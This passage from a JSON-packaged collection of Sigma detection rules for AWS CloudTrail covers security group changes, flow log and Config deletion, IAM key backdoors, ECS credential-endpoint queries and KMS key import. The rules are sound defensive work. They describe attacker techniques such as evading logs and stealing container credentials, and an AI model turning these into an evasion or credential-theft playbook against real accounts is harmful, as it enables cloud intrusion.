administrators.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_ingress_egress.yml",
    "content": "title: Ingress/Egress Security Group Modification\nid: 6fb77778-040f-4015-9440-572aa9b6b580\nstatus: test\ndescription: |\n    Detects when an account makes changes to the ingress or egress rules of a security group.\n    This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName:\n            - 'AuthorizeSecurityGroupEgress'\n            - 'AuthorizeSecurityGroupIngress'\n            - 'RevokeSecurityGroupEgress'\n            - 'RevokeSecurityGroupIngress'\n    condition: selection\nfalsepositives:\n    - New VPCs and Subnets being setup requiring a different security profile to those already defined\n    - A single port being opened for a new service that is known to be deploying\n    - Administrators closing unused ports to reduce the attack surface\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_loadbalancer.yml",
    "content": "title: LoadBalancer Security Group Modification\nid: 7a4409fc-f8ca-45f6-8006-127d779eaad9\nstatus: test\ndescription: |\n    Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB).\n    This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'elasticloadbalancing.amazonaws.com'\n        eventName:\n            - 'ApplySecurityGroupsToLoadBalancer'\n            - 'SetSecurityGroups'\n    condition: selection\nfalsepositives:\n    - Repurposing of an ELB or ALB to serve a different or additional application\n    - Changes to security groups to allow for new services to be deployed\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_rds.yml",
    "content": "title: RDS Database Security Group Modification\nid: 14f3f1c8-02d5-43a2-a191-91ffb52d3015\nstatus: test\ndescription: |\n    Detects changes to the security group entries for RDS databases.\n    This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.\nreferences:\n    - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/\nauthor: jamesc-grafana\ndate: 2024-07-11\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'rds.amazonaws.com'\n        eventName:\n            - 'AuthorizeDBSecurityGroupIngress'\n            - 'CreateDBSecurityGroup'\n            - 'DeleteDBSecurityGroup'\n            - 'RevokeDBSecurityGroupIngress'\n    condition: selection\nfalsepositives:\n    - Creation of a new Database that needs new security group rules\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_ssm_malicious_usage.yml",
    "content": "title: Potential Malicious Usage of CloudTrail System Manager\nid: 38e7f511-3f74-41d4-836e-f57dfa18eead\nstatus: test\ndescription: |\n    Detect when System Manager successfully executes commands against an instance.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/v8.6.0/rules/integrations/aws/initial_access_via_system_manager.toml\nauthor: jamesc-grafana\ndate: 2024-07-11\nmodified: 2025-12-08\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.t1566\n    - attack.t1566.002\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_event:\n        eventName: 'SendCommand'\n        eventSource: 'ssm.amazonaws.com'\n    selection_status_success:\n        errorCode: 'Success'\n    selection_status_null:\n        errorCode: null\n    condition: selection_event and 1 of selection_status_*\nfalsepositives:\n    - There are legitimate uses of SSM to send commands to EC2 instances\n    - Legitimate users may have to use SSM to perform actions against machines in the Cloud to update or maintain them\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_vpc_flow_logs_deleted.yml",
    "content": "title: AWS VPC Flow Logs Deleted\nid: e386b9b5-af12-450e-afff-761730fb8a98\nstatus: experimental\ndescription: |\n    Detects the deletion of one or more VPC Flow Logs in AWS Elastic Compute Cloud (EC2) through the DeleteFlowLogs API call.\n    Adversaries may delete flow logs to evade detection or remove evidence of network activity, hindering forensic investigations and visibility into malicious operations.\nreferences:\n    - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DeleteFlowLogs.html\n    - https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html\n    - https://www.elastic.co/docs/reference/security/prebuilt-rules/rules/integrations/aws/defense_evasion_ec2_flow_log_deletion\nauthor: Ivan Saakov\ndate: 2025-10-19\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_event_name:\n        eventName: 'DeleteFlowLogs'\n    selection_status_success:\n        errorCode: 'Success'\n    selection_status_null:\n        errorCode: null\n    condition: selection_event_name and 1 of selection_status_*\nfalsepositives:\n    - During maintenance operations or testing, authorized administrators may delete VPC Flow Logs as part of routine network management or cleanup activities.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml",
    "content": "title: AWS Config Disabling Channel/Recorder\nid: 07330162-dba1-4746-8121-a9647d49d297\nstatus: test\ndescription: Detects AWS Config Service disabling\nreferences:\n    - https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html\nauthor: vitaliy0x1\ndate: 2020-01-21\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.008\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'config.amazonaws.com'\n        eventName:\n            - 'DeleteDeliveryChannel'\n            - 'StopConfigurationRecorder'\n    condition: selection\nfalsepositives:\n    - Valid change in AWS Config Service\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml",
    "content": "title: AWS Console GetSigninToken Potential Abuse\nid: f8103686-e3e8-46f3-be72-65f7fcb4aa53\nstatus: test\ndescription: |\n    Detects potentially suspicious events involving \"GetSigninToken\".\n    An adversary using the \"aws_consoler\" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.\nreferences:\n    - https://github.com/NetSPI/aws_consoler\n    - https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/\nauthor: Chester Le Bron (@123Le_Bron)\ndate: 2024-02-26\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.t1021.007\n    - attack.t1550.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'signin.amazonaws.com'\n        eventName: 'GetSigninToken'\n    filter_main_console_ua:\n        userAgent|contains: 'Jersey/${project.version}'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_delete_identity.yml",
    "content": "title: SES Identity Has Been Deleted\nid: 20f754db-d025-4a8f-9d74-e0037e999a9a\nstatus: test\ndescription: Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022-12-13\nmodified: 2022-12-28\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ses.amazonaws.com'\n        eventName: 'DeleteIdentity'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_delete_saml_provider.yml",
    "content": "title: AWS SAML Provider Deletion Activity\nid: ccd6a6c8-bb4e-4a91-9d2a-07e632819374\nstatus: experimental\ndescription: |\n    Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access.\n    An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it.\nreferences:\n    - https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html\nauthor: Ivan Saakov\ndate: 2024-12-19\ntags:\n    - attack.t1078.004\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1531\n    - attack.impact\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'iam.amazonaws.com'\n        eventName: 'DeleteSAMLProvider'\n        status: 'success'\n    condition: selection\nfalsepositives:\n    - Automated processes using tools like Terraform may trigger this alert.\n    - Legitimate administrative actions by authorized system administrators could cause this alert. Verify the user identity, user agent, and hostname to ensure they are expected.\n    - Deletions by unfamiliar users should be investigated. If the behavior is known and expected, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml",
    "content": "title: AWS S3 Bucket Versioning Disable\nid: a136ac98-b2bc-4189-a14d-f0d0388e57a7\nstatus: test\ndescription: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.\nreferences:\n    - https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82\nauthor: Sean Johnstone | Unit 42\ndate: 2023-10-28\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: s3.amazonaws.com\n        eventName: PutBucketVersioning\n        requestParameters|contains: 'Suspended'\n    condition: selection\nfalsepositives:\n    - AWS administrator legitimately disabling bucket versioning\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml",
    "content": "title: AWS EC2 Disable EBS Encryption\nid: 16124c2d-e40b-4fcc-8f2c-5ab7870a2223\nstatus: stable\ndescription: |\n  Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\n  Disabling default encryption does not change the encryption status of your existing volumes.\nreferences:\n    - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html\nauthor: Sittikorn S\ndate: 2021-06-29\nmodified: 2021-08-20\ntags:\n    - attack.impact\n    - attack.t1486\n    - attack.t1565\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: ec2.amazonaws.com\n        eventName: DisableEbsEncryptionByDefault\n    condition: selection\nfalsepositives:\n    - System Administrator Activities\n    - DEV, UAT, SAT environment. You should apply this rule with PROD account only.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ec2_import_key_pair_activity.yml",
    "content": "title: AWS Key Pair Import Activity\nid: 92f84194-8d9a-4ee0-8699-c30bfac59780\nstatus: experimental\ndescription: |\n    Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.\nreferences:\n    - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html\nauthor: Ivan Saakov\ndate: 2024-12-19\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName: 'ImportKeyPair'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative actions by authorized users importing keys for valid purposes.\n    - Automated processes for infrastructure setup may trigger this alert.\n    - Verify the user identity, user agent, and source IP address to ensure they are expected.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml",
    "content": "title: AWS EC2 Startup Shell Script Change\nid: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df\nstatus: test\ndescription: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9\nauthor: faloker\ndate: 2020-02-12\nmodified: 2022-06-07\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - attack.t1059.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: ec2.amazonaws.com\n        requestParameters.attribute: 'userData'\n        eventName: ModifyInstanceAttribute\n    condition: selection_source\nfalsepositives:\n    - Valid changes to the startup script\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml",
    "content": "title: AWS EC2 VM Export Failure\nid: 54b9a76a-3c71-4673-b4b3-2edb4566ea7b\nstatus: test\ndescription: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.\nreferences:\n    - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance\nauthor: Diogo Braz\ndate: 2020-04-16\nmodified: 2022-10-05\ntags:\n    - attack.collection\n    - attack.t1005\n    - attack.exfiltration\n    - attack.t1537\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName: 'CreateInstanceExportTask'\n        eventSource: 'ec2.amazonaws.com'\n    filter1:\n        errorMessage|contains: '*'\n    filter2:\n        errorCode|contains: '*'\n    filter3:\n        responseElements|contains: 'Failure'\n    condition: selection and not 1 of filter*\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml",
    "content": "title: AWS ECS Task Definition That Queries The Credential Endpoint\nid: b94bf91e-c2bf-4047-9c43-c6810f43baad\nstatus: test\ndescription: |\n    Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.\n    This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py\n    - https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html\n    - https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html\nauthor: Darin Smith\ndate: 2022-06-07\nmodified: 2023-04-24\ntags:\n    - attack.persistence\n    - attack.t1525\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ecs.amazonaws.com'\n        eventName:\n            - 'DescribeTaskDefinition'\n            - 'RegisterTaskDefinition'\n            - 'RunTask'\n        requestParameters.containerDefinitions.command|contains: '$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI'\n    condition: selection\nfalsepositives:\n    - Task Definition being modified to request credentials from the Task Metadata Service for valid reasons\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml",
    "content": "title: AWS EFS Fileshare Modified or Deleted\nid: 25cb1ba1-8a19-4a23-a198-d252664c8cef\nstatus: test\ndescription: |\n  Detects when a EFS Fileshare is modified or deleted.\n  You can't delete a file system that is in use.\n  If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\nreferences:\n    - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-15\nmodified: 2022-10-09\ntags:\n    - attack.impact\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: elasticfilesystem.amazonaws.com\n        eventName: DeleteFileSystem\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml",
    "content": "title: AWS EFS Fileshare Mount Modified or Deleted\nid: 6a7ba45c-63d8-473e-9736-2eaabff79964\nstatus: test\ndescription: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.\nreferences:\n    - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html\nauthor: Austin Songer @austinsonger\ndate: 2021-08-15\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: elasticfilesystem.amazonaws.com\n        eventName: DeleteMountTarget\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml",
    "content": "title: AWS EKS Cluster Created or Deleted\nid: 33d50d03-20ec-4b74-a74e-1e65a38af1c0\nstatus: test\ndescription: Identifies when an EKS cluster is created or deleted.\nreferences:\n    - https://any-api.com/amazonaws_com/eks/docs/API_Description\nauthor: Austin Songer\ndate: 2021-08-16\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: eks.amazonaws.com\n        eventName:\n            - CreateCluster\n            - DeleteCluster\n    condition: selection\nfalsepositives:\n    - EKS Cluster being created or deleted may be performed by a system administrator.\n    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_elasticache_security_group_created.yml",
    "content": "title: AWS ElastiCache Security Group Created\nid: 4ae68615-866f-4304-b24b-ba048dfa5ca7\nstatus: test\ndescription: Detects when an ElastiCache security group has been created.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1136\n    - attack.t1136.003\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: elasticache.amazonaws.com\n        eventName: 'CreateCacheSecurityGroup'\n    condition: selection\nfalsepositives:\n    - A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\n\n\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml",
    "content": "title: AWS ElastiCache Security Group Modified or Deleted\nid: 7c797da2-9cf2-4523-ba64-33b06339f0cc\nstatus: test\ndescription: Identifies when an ElastiCache security group has been modified or deleted.\nreferences:\n    - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml\nauthor: Austin Songer @austinsonger\ndate: 2021-07-24\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: elasticache.amazonaws.com\n        eventName:\n            - 'DeleteCacheSecurityGroup'\n            - 'AuthorizeCacheSecurityGroupIngress'\n            - 'RevokeCacheSecurityGroupIngress'\n            - 'AuthorizeCacheSecurityGroupEgress'\n            - 'RevokeCacheSecurityGroupEgress'\n    condition: selection\nfalsepositives:\n    - A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\n\n\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_enum_buckets.yml",
    "content": "title: Potential Bucket Enumeration on AWS\nid: f305fd62-beca-47da-ad95-7690a0620084\nrelated:\n    - id: 4723218f-2048-41f6-bcb0-417f2d784f61\n      type: similar\nstatus: test\ndescription: Looks for potential enumeration of AWS buckets via ListBuckets.\nreferences:\n    - https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md\n    - https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html\n    - https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/\nauthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io\ndate: 2023-01-06\nmodified: 2024-07-10\ntags:\n    - attack.discovery\n    - attack.t1580\n    - attack.t1619\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 's3.amazonaws.com'\n        eventName: 'ListBuckets'\n    filter:\n        userIdentity.type: 'AssumedRole'\n    condition: selection and not filter\nfalsepositives:\n    - Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml",
    "content": "title: AWS GuardDuty Important Change\nid: 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3\nstatus: test\ndescription: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9\nauthor: faloker\ndate: 2020-02-11\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: guardduty.amazonaws.com\n        eventName: CreateIPSet\n    condition: selection_source\nfalsepositives:\n    - Valid change in the GuardDuty (e.g. to ignore internal scanners)\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_iam_backdoor_users_keys.yml",
    "content": "title: AWS IAM Backdoor Users Keys\nid: 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2\nstatus: test\ndescription: |\n  Detects AWS API key creation for a user by another user.\n  Backdoored users can be used to obtain persistence in the AWS environment.\n  Also with this alert, you can detect a flow of AWS keys in your org.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py\nauthor: faloker\ndate: 2020-02-12\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1098\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: iam.amazonaws.com\n        eventName: CreateAccessKey\n    filter:\n        userIdentity.arn|contains: responseElements.accessKey.userName\n    condition: selection_source and not filter\nfalsepositives:\n    - Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)\n    - AWS API keys legitimate exchange workflows\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml",
    "content": "title: AWS IAM S3Browser LoginProfile Creation\nid: db014773-b1d3-46bd-ba26-133337c0ffee\nstatus: test\ndescription: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.\nreferences:\n    - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor\nauthor: daniel.bohannon@permiso.io (@danielhbohannon)\ndate: 2023-05-17\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1059.009\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'iam.amazonaws.com'\n        eventName:\n            - 'GetLoginProfile'\n            - 'CreateLoginProfile'\n        userAgent|contains: 'S3 Browser'\n    condition: selection\nfalsepositives:\n    - Valid usage of S3 Browser for IAM LoginProfile listing and/or creation\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml",
    "content": "title: AWS IAM S3Browser Templated S3 Bucket Policy Creation\nid: db014773-7375-4f4e-b83b-133337c0ffee\nstatus: test\ndescription: Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of \"<YOUR-BUCKET-NAME>\".\nreferences:\n    - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor\nauthor: daniel.bohannon@permiso.io (@danielhbohannon)\ndate: 2023-05-17\ntags:\n    - attack.execution\n    - attack.t1059.009\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.privilege-escalation\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: iam.amazonaws.com\n        eventName: PutUserPolicy\n        userAgent|contains: 'S3 Browser'\n        requestParameters|contains|all:\n            - '\"arn:aws:s3:::<YOUR-BUCKET-NAME>/*\"'\n            - '\"s3:GetObject\"'\n            - '\"Allow\"'\n    condition: selection\nfalsepositives:\n    - Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml",
    "content": "title: AWS IAM S3Browser User or AccessKey Creation\nid: db014773-d9d9-4792-91e5-133337c0ffee\nstatus: test\ndescription: Detects S3 Browser utility creating IAM User or AccessKey.\nreferences:\n    - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor\nauthor: daniel.bohannon@permiso.io (@danielhbohannon)\ndate: 2023-05-17\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1059.009\n    - attack.t1078.004\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'iam.amazonaws.com'\n        eventName:\n            - 'CreateUser'\n            - 'CreateAccessKey'\n        userAgent|contains: 'S3 Browser'\n    condition: selection\nfalsepositives:\n    - Valid usage of S3 Browser for IAM User and/or AccessKey creation\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_kms_import_key_material.yml",
    "content": "title: AWS KMS Imported Key Material Usage\nid: 1279262f-1464-422f-ac0d-5b545320c526\nstatus: experimental\ndescription: |\n    Detects the import or deletion of key material in AWS KMS, which can be used as part of ransomware attacks. This activity is uncommon and provides a high certainty signal.\nreferences:\n    - https://www.chrisfarris.com/post/effective-aws-ransomware/\n    - https://docs.aws.amazon.com/kms/latest/developerguide/ct-importkeymaterial.html\n    - https://docs.aws.amazon.com/kms/latest/developerguide/ct-deleteimportedkeymaterial.html\nauthor: toopricey\ndate: 2025-10-18\ntags:\n    - attack.impact\n    - attack.t1486\n    - attack.resource-development\n    - attack.t1608.003\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'kms.amazonaws.com'\n        eventName:\n            - 'ImportKeyMaterial'\n            - 'DeleteImportedKeyMaterial'\n    condition: selection\nfalsepositives:\n    - Legitimate use cases for imported key material are rare, but may include, Organizations with hybrid cloud architectures that import external key material for compliance requirements.\n    - Development or testing environments that simulate external key management scenarios. Even in these cases, such activity is typically infrequent and should not add significant noise.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_lambda_function_url.yml",
    "content": "title: New AWS Lambda Function URL Configuration Created\nid: ec541962-c05a-4420-b9ea-84de072d18f4\nstatus: experimental\ndescription: |\n    Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls.\n    This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\nreferences:\n    - https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html\n    - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc\n    - https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws\nauthor: Ivan Saakov\ndate: 2024-12-19\ntags:\n    - attack.initial-access\n    - attack.privilege-escalation\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: lambda.amazonaws.com\n        eventName: 'CreateFunctionUrlConfig'\n    condition: selection\nfalsepositives:\n    - Creating a Lambda function URL configuration may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - Creating a Lambda function URL configuration from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/aws/cloudtrail/aws_new_lambda_layer_attached.yml",
